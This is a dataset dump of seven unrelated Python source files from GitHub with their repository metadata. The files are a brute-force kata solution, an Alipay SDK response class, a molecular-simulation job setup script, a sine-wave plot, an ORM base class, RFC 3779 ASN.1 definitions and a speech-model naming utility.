Dataset schema (one entry per column, with the viewer-reported length/value ranges):

- blob_id: string (length 40)
- directory_id: string (length 40)
- path: string (lengths 3 to 288)
- content_id: string (length 40)
- detected_licenses: list (lengths 0 to 112)
- license_type: string (2 classes)
- repo_name: string (lengths 5 to 115)
- snapshot_id: string (length 40)
- revision_id: string (length 40)
- branch_name: string (684 classes)
- visit_date: timestamp[us] (2015-08-06 10:31:46 to 2023-09-06 10:44:38)
- revision_date: timestamp[us] (1970-01-01 02:38:32 to 2037-05-03 13:00:00)
- committer_date: timestamp[us] (1970-01-01 02:38:32 to 2023-09-06 01:08:06)
- github_id: int64 (4.92k to 681M, nullable)
- star_events_count: int64 (0 to 209k)
- fork_events_count: int64 (0 to 110k)
- gha_license_id: string (22 classes)
- gha_event_created_at: timestamp[us] (2012-06-04 01:52:49 to 2023-09-14 21:59:50, nullable)
- gha_created_at: timestamp[us] (2008-05-22 07:58:19 to 2023-08-21 12:35:19, nullable)
- gha_language: string (147 classes)
- src_encoding: string (25 classes)
- language: string (1 value)
- is_vendor: bool (2 classes)
- is_generated: bool (2 classes)
- length_bytes: int64 (128 to 12.7k)
- extension: string (142 classes)
- content: string (lengths 128 to 8.19k)
- authors: list (length 1)
- author_id: string (lengths 1 to 132)

blob_id: 552b996cc76cd62cf2dd0b73ebf1972aec0af841 | directory_id: 988176bcdae841e08106b0fe5cf07aabbc210c83 | content_id: c871699196e8fd15530261a7480607de06e2522f
path: /minimum sum of the maximum elements obtained by considering all consecutive pairs of adjacent elements after rearranging the array suitably.py
detected_licenses: [] | license_type: no_license
repo_name: gopiprasad008/GUVI_CODEKATA_PYTHON_CODE | snapshot_id: ce1a63c7eea2a099c01748162c1deb47172dcd0a | revision_id: 78f374e344df25aab181408d8f41b3ebe03b34ef | branch_name: refs/heads/master
visit_date: 2023-03-16T00:27:31.539524 | revision_date: 2020-05-16T11:46:08 | committer_date: 2020-05-16T11:46:08
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 284 | extension: py
content:
from itertools import permutations

n = int(input())                        # declared length (unused; recomputed below)
l = [int(x) for x in input().split()]
n = len(l)
m = list(permutations(l, len(l)))       # brute force: materialise all n! orderings
a = 0
for i in range(len(m)):
    b = 0
    for j in range(len(m[i]) - 1):
        b += max(m[i][j], m[i][j + 1])  # sum of max over consecutive pairs
    if b > a:                           # keeps the largest such sum, despite the
        a = b                           # "minimum" in the file name
print(a)
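A hand-checked example run of the brute force above (hypothetical stdin, worked by hand):

# stdin: "4" then "1 2 3 4"
# The best arrangement keeps 4 in the interior, e.g. (2, 4, 1, 3):
# max(2,4) + max(4,1) + max(1,3) = 4 + 4 + 3 = 11, so the script prints 11.
# Note the O(n! * n) cost: feasible only for small n.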
authors: ["noreply@github.com"] | author_id: gopiprasad008.noreply@github.com

blob_id: 087a01950facd0b6e12f0c2c3ec8eeef6135feb5 | directory_id: 0b01cb61a4ae4ae236a354cbfa23064e9057e434 | content_id: d46129cc828bcc061ec6d475c1359df544675c21
path: /alipay/aop/api/response/KoubeiTradeOrderEnterpriseQueryResponse.py
detected_licenses: ["Apache-2.0"] | license_type: permissive
repo_name: hipacloud/alipay-sdk-python-all | snapshot_id: e4aec2869bf1ea6f7c6fb97ac7cc724be44ecd13 | revision_id: bdbffbc6d5c7a0a3dd9db69c99443f98aecf907d | branch_name: refs/heads/master
visit_date: 2022-11-14T11:12:24.441822 | revision_date: 2020-07-14T03:12:15 | committer_date: 2020-07-14T03:12:15
github_id: 277,970,730 | star_events_count: 0 | fork_events_count: 0
gha_license_id: Apache-2.0 | gha_event_created_at: 2020-07-08T02:33:15 | gha_created_at: 2020-07-08T02:33:14 | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 4,551 | extension: py
content:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json

from alipay.aop.api.response.AlipayResponse import AlipayResponse


class KoubeiTradeOrderEnterpriseQueryResponse(AlipayResponse):

    def __init__(self):
        super(KoubeiTradeOrderEnterpriseQueryResponse, self).__init__()
        self._buyer_user_id = None
        self._ext_info = None
        self._merchant_subsidy_amount = None
        self._order_no = None
        self._order_product = None
        self._out_order_no = None
        self._partner_id = None
        self._real_amount = None
        self._seller_id = None
        self._shop_id = None
        self._status = None
        self._subject = None
        self._subsidy_amount = None
        self._total_amount = None

    @property
    def buyer_user_id(self):
        return self._buyer_user_id

    @buyer_user_id.setter
    def buyer_user_id(self, value):
        self._buyer_user_id = value

    @property
    def ext_info(self):
        return self._ext_info

    @ext_info.setter
    def ext_info(self, value):
        self._ext_info = value

    @property
    def merchant_subsidy_amount(self):
        return self._merchant_subsidy_amount

    @merchant_subsidy_amount.setter
    def merchant_subsidy_amount(self, value):
        self._merchant_subsidy_amount = value

    @property
    def order_no(self):
        return self._order_no

    @order_no.setter
    def order_no(self, value):
        self._order_no = value

    @property
    def order_product(self):
        return self._order_product

    @order_product.setter
    def order_product(self, value):
        self._order_product = value

    @property
    def out_order_no(self):
        return self._out_order_no

    @out_order_no.setter
    def out_order_no(self, value):
        self._out_order_no = value

    @property
    def partner_id(self):
        return self._partner_id

    @partner_id.setter
    def partner_id(self, value):
        self._partner_id = value

    @property
    def real_amount(self):
        return self._real_amount

    @real_amount.setter
    def real_amount(self, value):
        self._real_amount = value

    @property
    def seller_id(self):
        return self._seller_id

    @seller_id.setter
    def seller_id(self, value):
        self._seller_id = value

    @property
    def shop_id(self):
        return self._shop_id

    @shop_id.setter
    def shop_id(self, value):
        self._shop_id = value

    @property
    def status(self):
        return self._status

    @status.setter
    def status(self, value):
        self._status = value

    @property
    def subject(self):
        return self._subject

    @subject.setter
    def subject(self, value):
        self._subject = value

    @property
    def subsidy_amount(self):
        return self._subsidy_amount

    @subsidy_amount.setter
    def subsidy_amount(self, value):
        self._subsidy_amount = value

    @property
    def total_amount(self):
        return self._total_amount

    @total_amount.setter
    def total_amount(self, value):
        self._total_amount = value

    def parse_response_content(self, response_content):
        response = super(KoubeiTradeOrderEnterpriseQueryResponse, self).parse_response_content(response_content)
        if 'buyer_user_id' in response:
            self.buyer_user_id = response['buyer_user_id']
        if 'ext_info' in response:
            self.ext_info = response['ext_info']
        if 'merchant_subsidy_amount' in response:
            self.merchant_subsidy_amount = response['merchant_subsidy_amount']
        if 'order_no' in response:
            self.order_no = response['order_no']
        if 'order_product' in response:
            self.order_product = response['order_product']
        if 'out_order_no' in response:
            self.out_order_no = response['out_order_no']
        if 'partner_id' in response:
            self.partner_id = response['partner_id']
        if 'real_amount' in response:
            self.real_amount = response['real_amount']
        if 'seller_id' in response:
            self.seller_id = response['seller_id']
        if 'shop_id' in response:
            self.shop_id = response['shop_id']
        if 'status' in response:
            self.status = response['status']
        if 'subject' in response:
            self.subject = response['subject']
        if 'subsidy_amount' in response:
            self.subsidy_amount = response['subsidy_amount']
        if 'total_amount' in response:
            self.total_amount = response['total_amount']
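A minimal usage sketch for the DTO above, assuming the AlipayResponse base class unwraps the standard *_response envelope and returns the body as a dict (the payload below is invented, not from the SDK docs):

# Hypothetical illustration; field values are invented.
resp = KoubeiTradeOrderEnterpriseQueryResponse()
resp.parse_response_content(
    '{"koubei_trade_order_enterprise_query_response":'
    ' {"order_no": "20200714001", "status": "SUCCESS", "total_amount": "12.50"}}'
)
print(resp.order_no, resp.status, resp.total_amount)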
authors: ["ben.zy@antfin.com"] | author_id: ben.zy@antfin.com

blob_id: 55a28b610c9796ee5d9f9724c9a0bfe4eb09061c | directory_id: f3b233e5053e28fa95c549017bd75a30456eb50c | content_id: 4e1279d74cc1ddc180be8d4b21bde67aa12bb920
path: /bace_input/L4M/4M-4J_wat_20Abox/set_3.py
detected_licenses: [] | license_type: no_license
repo_name: AnguseZhang/Input_TI | snapshot_id: ddf2ed40ff1c0aa24eea3275b83d4d405b50b820 | revision_id: 50ada0833890be9e261c967d00948f998313cb60 | branch_name: refs/heads/master
visit_date: 2021-05-25T15:02:38.858785 | revision_date: 2020-02-18T16:57:04 | committer_date: 2020-02-18T16:57:04
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 738 | extension: py
content:
import os

# Stage TI production inputs and PBS job scripts for every lambda window,
# copying the shared templates from files/ and substituting the lambda value.
dir = '/mnt/scratch/songlin3/run/bace/L4M/wat_20Abox/ti_one-step/4M_4J/'
filesdir = dir + 'files/'
temp_prodin = filesdir + 'temp_prod_3.in'
temp_pbs = filesdir + 'temp_3.pbs'

lambd = [0.00922, 0.04794, 0.11505, 0.20634, 0.31608, 0.43738,
         0.56262, 0.68392, 0.79366, 0.88495, 0.95206, 0.99078]

for j in lambd:
    os.chdir("%6.5f" % (j))
    workdir = dir + "%6.5f" % (j) + '/'
    # prodin: copy the template, then replace the XXX placeholder with lambda
    prodin = workdir + "%6.5f_prod_3.in" % (j)
    os.system("cp %s %s" % (temp_prodin, prodin))
    os.system("sed -i 's/XXX/%6.5f/g' %s" % (j, prodin))
    # PBS
    pbs = workdir + "%6.5f_3.pbs" % (j)
    os.system("cp %s %s" % (temp_pbs, pbs))
    os.system("sed -i 's/XXX/%6.5f/g' %s" % (j, pbs))
    # submit pbs
    #os.system("qsub %s" %(pbs))
    os.chdir(dir)
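The same placeholder substitution can be done without shelling out to sed; a sketch, assuming the templates are plain text (instantiate_template is a hypothetical helper, not part of the repo):

from pathlib import Path

def instantiate_template(template, lam, dest):
    # Mirrors `sed -i 's/XXX/%6.5f/g'`: every XXX becomes the lambda value.
    Path(dest).write_text(Path(template).read_text().replace("XXX", "%6.5f" % lam))

instantiate_template("files/temp_prod_3.in", 0.00922, "0.00922/0.00922_prod_3.in")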
authors: ["songlin3@msu.edu"] | author_id: songlin3@msu.edu

blob_id: b84e8238b02903cb56003a86f49f4d732686de63 | directory_id: 2ec26d004a653c0576594e48ac13dd71f539b30a | content_id: 48a1342ece579d42dc108367e41efe8f91e1bd2b
path: /gist_dump/sine_destruction.py
detected_licenses: [] | license_type: no_license
repo_name: kastnerkyle/research_megarepo | snapshot_id: 6aca5b2c3b2413e0def1093b23f2826e3e7e5e97 | revision_id: ab182667650fd59b99f75d4b599d7ace77a3f30b | branch_name: refs/heads/master
visit_date: 2021-01-17T20:31:52.250050 | revision_date: 2016-12-27T01:28:54 | committer_date: 2016-12-27T01:28:54
github_id: 68,341,074 | star_events_count: 13 | fork_events_count: 2
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 419 | extension: py
content:
# Author: Kyle Kastner
# License: BSD 3-clause
import matplotlib.pyplot as plt
import numpy as np
fs = 100 # sample rate of 100 samples / sec, with max f 50
f = 5 # 5 Hz frequency
samples = 25 # .25 seconds of samples @ 100 samples / sec
x = np.arange(samples)
y1 = np.sin(2 * np.pi * f * x / fs + .5 * np.pi)
y2 = np.sin(2 * np.pi * f * x / fs + -.5 * np.pi)
plt.plot(y1)
plt.plot(y2)
plt.plot(y1 + y2)
plt.show()
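The two traces cancel exactly, since sin(t + pi/2) + sin(t - pi/2) = 2*sin(t)*cos(pi/2) = 0, so the third curve is flat at zero. A quick standalone check with the same constants:

import numpy as np

x = np.arange(25)
y1 = np.sin(2 * np.pi * 5 * x / 100 + 0.5 * np.pi)
y2 = np.sin(2 * np.pi * 5 * x / 100 - 0.5 * np.pi)
assert np.allclose(y1 + y2, 0)  # destructive interference, hence the file name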
authors: ["kastnerkyle@gmail.com"] | author_id: kastnerkyle@gmail.com

blob_id: cf9c444fa59eb0b67c60813865bf38503df80ad9 | directory_id: e728a7b5447c4ca03ba799bec61459528f30fd88 | content_id: 6effe6136b1881fe62efa747a7f8180ffab43f4b
path: /esvi/model.py
detected_licenses: [] | license_type: no_license
repo_name: reritom/Esvi | snapshot_id: deb75c0ca4b17494ed80adc3b735be008e0b3352 | revision_id: 1e3242c61ec86af7b7479cd71f12a8677fcbde1f | branch_name: refs/heads/master
visit_date: 2020-03-20T02:08:01.695643 | revision_date: 2018-11-04T18:35:52 | committer_date: 2018-11-04T18:35:52
github_id: 137,100,179 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 6,492 | extension: py
content:
from esvi import fields
from esvi.query import Query
from esvi.model_instance import ModelInstance
from esvi.query_executor import QueryExecutor
from esvi.model_set import ModelSet

from typing import Optional


class Model():
    """
    This class is to be inherited by child models. The static methods for interacting with the DB executor also call __new__
    so that the child attributes can be retrieved without the child class needing to be instantiated first.
    """
    child_retrieved = False

    def __new__(cls, internal=False):
        print("In model new")
        # To allow the classmethods to access child properties without an explicit instantiation, this method gets called by each
        # classmethod. The following flag checks whether it has already been run or not
        if cls.child_retrieved == True and internal == True:
            return

        # Initialise the model name
        cls.model_name = getattr(cls, 'model_name') if hasattr(cls, 'model_name') else cls.__name__ + "Model"

        # Initialise the fields
        cls.model_fields = dict()

        # Primary Key flag
        pk_flag = 0

        # Here we grab any fields from the child class attributes
        for value in dir(cls):
            class_attribute = getattr(cls, value)
            if hasattr(class_attribute, '__class__') and class_attribute.__class__.__base__ == fields.BaseField:
                cls.model_fields[value] = class_attribute
                if class_attribute.is_primary():
                    cls.primary_key = value
                    pk_flag += 1

        if pk_flag != 1:  # `is not 1` compared identity, not value
            raise Exception("Model {0} is missing a primary key field".format(cls.model_name))

        cls.child_retrieved = True
        cls.executor = QueryExecutor()
        return cls

    @classmethod
    def get_model_name(cls) -> str:
        """
        Return the model name from the child
        """
        Model.__new__(cls, internal=True)
        return cls.model_name

    @classmethod
    def get_primary_key(cls) -> str:
        """
        Return the primary key field name from the child
        """
        Model.__new__(cls, internal=True)
        return cls.primary_key

    @classmethod
    def get_fields(cls) -> dict:
        """
        Return a dictionary with the field names and their field classes
        """
        Model.__new__(cls, internal=True)
        return cls.model_fields

    @classmethod
    def _initialise_in_db(cls) -> None:
        """
        This will add the model definition to the DB
        """
        Model.__new__(cls, internal=True)
        # Here we create the query and pass it to the executor
        query = Query(model_name=cls.model_name, model_fields=cls.model_fields, action="initialise")
        response = cls.executor.execute(query)

    @classmethod
    def _get_defition_from_db(cls) -> None:
        """
        Retrieves the model fields from the DB in a list of field names in the correct order
        """
        Model.__new__(cls, internal=True)
        # Here we create the query and pass it to the executor
        query = Query(model_name=cls.model_name, model_fields=None, action="definition")
        response = cls.executor.execute(query)

    @classmethod
    def create(cls, **kwargs) -> ModelInstance:
        """
        Create a model item in the DB
        """
        Model.__new__(cls, internal=True)

        # Initialise the content of this model
        content = dict()

        # Here we validate that the model is being initialised with enough information
        for field_name, definition in cls.model_fields.items():
            if field_name in kwargs:
                # Check if it is in the kwargs
                definition.validate(kwargs[field_name])
                print("Field name {} is class {}".format(field_name, kwargs[field_name].__class__.__name__))

                # If it is a foreign key (the value is a ModelInstance)
                if isinstance(kwargs[field_name], ModelInstance):
                    print("Is model instance")
                    # We convert the value to the primary key and primary value
                    primary_key = kwargs[field_name].get_primary_key()
                    print("Primary key is {}".format(primary_key))
                    content[primary_key] = kwargs[field_name].get(primary_key)
                    continue

                content[field_name] = kwargs[field_name]
            elif definition.has_default():
                # Check if it has a default value
                content[field_name] = definition.get_default()
            else:
                raise Exception("{} missing as parameter and has no default".format(field_name))

        # Here we create the query and pass it to the executor
        query = Query(model_name=cls.model_name, model_fields=cls.model_fields, action="create", content=content)
        response = cls.executor.execute(query)
        return ModelInstance(model_name=cls.model_name, model_fields=cls.model_fields, model_content=response) if response else None

    @classmethod
    def retrieve(cls, primary_key_value) -> Optional[ModelInstance]:
        """
        Retrieve a single model by primary key
        """
        Model.__new__(cls, internal=True)
        query = Query(model_name=cls.model_name, model_fields=cls.model_fields, action="retrieve", content=primary_key_value)
        response = cls.executor.execute(query)
        return ModelInstance(model_name=cls.model_name, model_fields=cls.model_fields, model_content=response) if response else None

    @classmethod
    def retrieve_all(cls) -> ModelSet:
        """
        Retrieve all of the model items from the db and returns them in a model set
        """
        Model.__new__(cls, internal=True)
        query = Query(model_name=cls.model_name, model_fields=cls.model_fields, action="all")
        response = cls.executor.execute(query)
        print("Retrieve all response is {}".format(response))
        return ModelSet([ModelInstance(model_name=cls.model_name, model_fields=cls.model_fields, model_content=i) for i in response])

    @classmethod
    def filter(cls, **kwargs) -> ModelSet:
        Model.__new__(cls, internal=True)
        filters = ['_less_or_equal',
                   '_greater_or_equal',
                   'equal',
                   '_less_than',
                   '_greater_than',
                   'between_inc',
                   'between',
                   'not']
        pass
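A sketch of what a child model might look like given the hooks above; fields.StringField and its primary keyword are assumptions about the esvi.fields module, not confirmed API:

# Hypothetical child model (field class and kwargs are assumed):
class Customer(Model):
    customer_id = fields.StringField(primary=True)
    name = fields.StringField()

print(Customer.get_model_name())   # "CustomerModel" unless model_name is set
print(Customer.get_primary_key())  # "customer_id"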
authors: ["reikudjinn@gmail.com"] | author_id: reikudjinn@gmail.com

blob_id: 18cb063d140ca52402076ae16b83ac2bbdaa92cb | directory_id: 3a6a211ea0d32405497fbd6486c490bb147e25f9 | content_id: aaf856e822b6d15286373124b860200a0e6768d6
path: /third_party/pyasn1_modules/pyasn1_modules/rfc3779.py
detected_licenses: ["BSD-3-Clause", "BSD-2-Clause"] | license_type: permissive
repo_name: catapult-project/catapult | snapshot_id: e2cbdd5eb89f3b1492fc8752494e62ea1df4bae0 | revision_id: 53102de187a48ac2cfc241fef54dcbc29c453a8e | branch_name: refs/heads/main
visit_date: 2021-05-25T07:37:22.832505 | revision_date: 2021-05-24T08:01:49 | committer_date: 2021-05-25T06:07:38
github_id: 33,947,548 | star_events_count: 2,032 | fork_events_count: 742
gha_license_id: BSD-3-Clause | gha_event_created_at: 2022-08-26T16:01:18 | gha_created_at: 2015-04-14T17:49:05 | gha_language: HTML
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 2,750 | extension: py
content:
#
# This file is part of pyasn1-modules software.
#
# Created by Russ Housley with assistance from asn1ate v.0.6.0.
#
# Copyright (c) 2019, Vigil Security, LLC
# License: http://snmplabs.com/pyasn1/license.html
#
# X.509 Extensions for IP Addresses and AS Identifiers
#
# ASN.1 source from:
# https://www.rfc-editor.org/rfc/rfc3779.txt
#

from pyasn1.type import univ, char, namedtype, namedval, tag, constraint, useful


# IP Address Delegation Extension

id_pe_ipAddrBlocks = univ.ObjectIdentifier('1.3.6.1.5.5.7.1.7')


class IPAddress(univ.BitString):
    pass


class IPAddressRange(univ.Sequence):
    pass

IPAddressRange.componentType = namedtype.NamedTypes(
    namedtype.NamedType('min', IPAddress()),
    namedtype.NamedType('max', IPAddress())
)


class IPAddressOrRange(univ.Choice):
    pass

IPAddressOrRange.componentType = namedtype.NamedTypes(
    namedtype.NamedType('addressPrefix', IPAddress()),
    namedtype.NamedType('addressRange', IPAddressRange())
)


class IPAddressChoice(univ.Choice):
    pass

IPAddressChoice.componentType = namedtype.NamedTypes(
    namedtype.NamedType('inherit', univ.Null()),
    namedtype.NamedType('addressesOrRanges', univ.SequenceOf(componentType=IPAddressOrRange()))
)


class IPAddressFamily(univ.Sequence):
    pass

IPAddressFamily.componentType = namedtype.NamedTypes(
    namedtype.NamedType('addressFamily', univ.OctetString().subtype(subtypeSpec=constraint.ValueSizeConstraint(2, 3))),
    namedtype.NamedType('ipAddressChoice', IPAddressChoice())
)


class IPAddrBlocks(univ.SequenceOf):
    pass

IPAddrBlocks.componentType = IPAddressFamily()


# Autonomous System Identifier Delegation Extension

id_pe_autonomousSysIds = univ.ObjectIdentifier('1.3.6.1.5.5.7.1.8')


class ASId(univ.Integer):
    pass


class ASRange(univ.Sequence):
    pass

ASRange.componentType = namedtype.NamedTypes(
    namedtype.NamedType('min', ASId()),
    namedtype.NamedType('max', ASId())
)


class ASIdOrRange(univ.Choice):
    pass

ASIdOrRange.componentType = namedtype.NamedTypes(
    namedtype.NamedType('id', ASId()),
    namedtype.NamedType('range', ASRange())
)


class ASIdentifierChoice(univ.Choice):
    pass

ASIdentifierChoice.componentType = namedtype.NamedTypes(
    namedtype.NamedType('inherit', univ.Null()),
    namedtype.NamedType('asIdsOrRanges', univ.SequenceOf(componentType=ASIdOrRange()))
)


class ASIdentifiers(univ.Sequence):
    pass

ASIdentifiers.componentType = namedtype.NamedTypes(
    namedtype.OptionalNamedType('asnum', ASIdentifierChoice().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
    namedtype.OptionalNamedType('rdi', ASIdentifierChoice().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1)))
)
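A small sketch of building and DER-encoding one of these structures with pyasn1 (the address-family bytes and the 'inherit' choice are invented example values):

from pyasn1.codec.der import encoder

fam = IPAddressFamily()
fam['addressFamily'] = univ.OctetString(hexValue='0001')  # IPv4, no SAFI octet
choice = IPAddressChoice()
choice['inherit'] = univ.Null('')  # delegate inherits from the issuer
fam['ipAddressChoice'] = choice
blocks = IPAddrBlocks()
blocks.append(fam)
der_bytes = encoder.encode(blocks)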
authors: ["commit-bot@chromium.org"] | author_id: commit-bot@chromium.org

blob_id: 4eb2f293067b5f57a370ad4125140d766cdc0ad6 | directory_id: 4374b25bd4d7ea4a8d890b08b68ae52ed93c5eaf | content_id: 2121447c1841b0f00c16ed8c596d9bf4f95d6c89
path: /neural_sp/bin/model_name.py
detected_licenses: ["Apache-2.0"] | license_type: permissive
repo_name: smilelite/neural_sp | snapshot_id: 61833dc20f6ddd36b21e55663f539929c69a9399 | revision_id: 86fee124982f7483656aa6b8d5db3715fda12460 | branch_name: refs/heads/master
visit_date: 2023-04-06T23:31:19.258575 | revision_date: 2021-04-06T16:02:11 | committer_date: 2021-04-06T16:02:11
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 8,097 | extension: py
content:
# Copyright 2019 Kyoto University (Hirofumi Inaguma)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)

"""Set model name."""

import os

from neural_sp.bin.train_utils import load_config


def _define_encoder_name(dir_name, args):
    if args.enc_type == 'tds':
        from neural_sp.models.seq2seq.encoders.tds import TDSEncoder as module
    elif args.enc_type == 'gated_conv':
        from neural_sp.models.seq2seq.encoders.gated_conv import GatedConvEncoder as module
    elif 'transformer' in args.enc_type:
        from neural_sp.models.seq2seq.encoders.transformer import TransformerEncoder as module
    elif 'conformer' in args.enc_type:
        from neural_sp.models.seq2seq.encoders.conformer import ConformerEncoder as module
    else:
        from neural_sp.models.seq2seq.encoders.rnn import RNNEncoder as module

    if hasattr(module, 'define_name'):
        dir_name = module.define_name(dir_name, args)
    else:
        raise NotImplementedError(module)
    return dir_name


def _define_decoder_name(dir_name, args):
    if args.dec_type in ['transformer', 'transformer_xl']:
        from neural_sp.models.seq2seq.decoders.transformer import TransformerDecoder as module
    elif args.dec_type in ['transformer_transducer', 'transformer_transducer_xl']:
        from neural_sp.models.seq2seq.decoders.transformer_transducer import TransformerTransducer as module
    elif args.dec_type in ['lstm_transducer', 'gru_transducer']:
        from neural_sp.models.seq2seq.decoders.rnn_transducer import RNNTransducer as module
    elif args.dec_type == 'asg':
        from neural_sp.models.seq2seq.decoders.asg import ASGDecoder as module
    else:
        from neural_sp.models.seq2seq.decoders.las import RNNDecoder as module

    if hasattr(module, 'define_name'):
        dir_name = module.define_name(dir_name, args)
    else:
        raise NotImplementedError(module)
    return dir_name


def _define_lm_name(dir_name, args):
    if 'gated_conv' in args.lm_type:
        from neural_sp.models.lm.gated_convlm import GatedConvLM as module
    elif args.lm_type == 'transformer':
        from neural_sp.models.lm.transformerlm import TransformerLM as module
    elif args.lm_type == 'transformer_xl':
        from neural_sp.models.lm.transformer_xl import TransformerXL as module
    else:
        from neural_sp.models.lm.rnnlm import RNNLM as module

    if hasattr(module, 'define_name'):
        dir_name = module.define_name(dir_name, args)
    else:
        raise NotImplementedError(module)
    return dir_name


def set_asr_model_name(args):
    # encoder
    dir_name = args.enc_type.replace('conv_', '')
    dir_name = _define_encoder_name(dir_name, args)
    if args.n_stacks > 1:
        dir_name += '_stack' + str(args.n_stacks)
    else:
        dir_name += '_' + args.subsample_type + str(args.subsample_factor)
    if args.sequence_summary_network:
        dir_name += '_ssn'

    # decoder
    if args.ctc_weight < 1:
        dir_name = _define_decoder_name(dir_name, args)

    # optimization
    dir_name += '_' + args.optimizer
    if args.optimizer == 'noam':
        dir_name += '_lr' + str(args.lr_factor)
    else:
        dir_name += '_lr' + str(args.lr)
    dir_name += '_bs' + str(args.batch_size)
    if args.train_dtype in ["O0", "O1", "O2", "O3"]:
        dir_name += '_' + args.train_dtype
    # if args.shuffle_bucket:
    #     dir_name += '_bucket'
    # if 'transformer' in args.enc_type or 'transformer' in args.dec_type:
    #     dir_name += '_' + args.transformer_param_init

    # regularization
    if args.lsm_prob > 0:
        dir_name += '_ls' + str(args.lsm_prob)
    if args.warmup_n_steps > 0:
        dir_name += '_warmup' + str(args.warmup_n_steps)
    if args.accum_grad_n_steps > 1:
        dir_name += '_accum' + str(args.accum_grad_n_steps)

    # LM integration
    if args.lm_fusion:
        dir_name += '_' + args.lm_fusion

    # MTL
    if args.mtl_per_batch:
        if args.ctc_weight > 0:
            dir_name += '_' + args.unit + 'ctc'
        if args.bwd_weight > 0:
            dir_name += '_' + args.unit + 'bwd'
        for sub in ['sub1', 'sub2']:
            if args.get('train_set_' + sub) is not None:
                dir_name += '_' + args.get('unit_' + sub) + str(args.get('vocab_' + sub))
                if args.get('ctc_weight_' + sub, 0) > 0:
                    dir_name += 'ctc'
                if args.get(sub + '_weight', 0) - args.get('ctc_weight_' + sub, 0) > 0:
                    dir_name += 'fwd'
    else:
        if args.ctc_weight > 0:
            dir_name += '_ctc' + str(args.ctc_weight)
        if args.bwd_weight > 0:
            dir_name += '_bwd' + str(args.bwd_weight)
        for sub in ['sub1', 'sub2']:
            if args.get(sub + '_weight', 0) > 0:
                dir_name += '_' + args.get('unit_' + sub) + str(args.get('vocab_' + sub))
                if args.get('ctc_weight_' + sub, 0) > 0:
                    dir_name += 'ctc%.1f' % args.get('ctc_weight_' + sub)
                if args.get(sub + '_weight', 0) - args.get('ctc_weight_' + sub, 0) > 0:
                    dir_name += 'fwd%.2f' % (args.total_weight - args.get(sub + '_weight', 0) - args.get('ctc_weight_' + sub, 0))
    if args.task_specific_layer:
        dir_name += '_tsl'

    # SpecAugment
    if args.n_freq_masks > 0:
        dir_name += '_' + str(args.freq_width) + 'FM' + str(args.n_freq_masks)
    if args.n_time_masks > 0:
        if args.adaptive_number_ratio > 0:
            dir_name += '_pnum' + str(args.adaptive_number_ratio)
        else:
            dir_name += '_' + str(args.time_width) + 'TM' + str(args.n_time_masks)
        if args.adaptive_size_ratio > 0:
            dir_name += '_psize' + str(args.adaptive_size_ratio)
    if args.input_noise_std > 0:
        dir_name += '_Inoise'
    if args.weight_noise_std > 0:
        dir_name += '_Wnoise'

    # contextualization
    if args.discourse_aware:
        dir_name += '_discourse'
    if args.mem_len > 0:
        dir_name += '_mem' + str(args.mem_len)
    if args.bptt > 0:
        dir_name += '_bptt' + str(args.bptt)

    # Pre-training
    if args.asr_init and os.path.isfile(args.asr_init):
        conf_init = load_config(os.path.join(os.path.dirname(args.asr_init), 'conf.yml'))
        dir_name += '_' + conf_init['unit'] + 'pt'
    if args.freeze_encoder:
        dir_name += '_encfreeze'
    if args.lm_init:
        dir_name += '_lminit'

    # knowledge distillation
    if args.teacher:
        dir_name += '_KD' + str(args.soft_label_weight)
    if args.teacher_lm:
        dir_name += '_lmKD' + str(args.soft_label_weight)

    # MBR training
    if args.mbr_training:
        dir_name += '_MBR' + str(args.recog_beam_width) + 'best'
        dir_name += '_ce' + str(args.mbr_ce_weight) + '_smooth' + str(args.recog_softmax_smoothing)

    if args.n_gpus > 1:
        dir_name += '_' + str(args.n_gpus) + 'GPU'

    return dir_name


def set_lm_name(args):
    dir_name = ''
    dir_name = _define_lm_name(dir_name, args)

    # optimization
    dir_name += '_' + args.optimizer
    if args.optimizer == 'noam':
        dir_name += '_lr' + str(args.lr_factor)
    else:
        dir_name += '_lr' + str(args.lr)
    dir_name += '_bs' + str(args.batch_size)
    if args.train_dtype in ["O0", "O1", "O2", "O3"]:
        dir_name += '_' + args.train_dtype
    dir_name += '_bptt' + str(args.bptt)

    # regularization
    dir_name += '_dropI' + str(args.dropout_in) + 'H' + str(args.dropout_hidden)
    if args.get('dropout_layer', 0) > 0:
        dir_name += 'Layer' + str(args.dropout_layer)
    if args.lsm_prob > 0:
        dir_name += '_ls' + str(args.lsm_prob)
    if args.warmup_n_steps > 0:
        dir_name += '_warmup' + str(args.warmup_n_steps)
    if args.accum_grad_n_steps > 1:
        dir_name += '_accum' + str(args.accum_grad_n_steps)

    if args.backward:
        dir_name += '_bwd'
    if args.shuffle:
        dir_name += '_shuffle'
    if args.serialize:
        dir_name += '_serialize'
    return dir_name
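A standalone toy of the same suffix-accumulation pattern the functions above use (not neural_sp's API; the argument values are invented):

from types import SimpleNamespace

args = SimpleNamespace(optimizer='noam', lr_factor=5.0, lr=1e-3, batch_size=32)
name = 'transformer'
name += '_' + args.optimizer
name += '_lr' + str(args.lr_factor if args.optimizer == 'noam' else args.lr)
name += '_bs' + str(args.batch_size)
print(name)  # transformer_noam_lr5.0_bs32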
authors: ["hiro.mhbc@gmail.com"] | author_id: hiro.mhbc@gmail.com

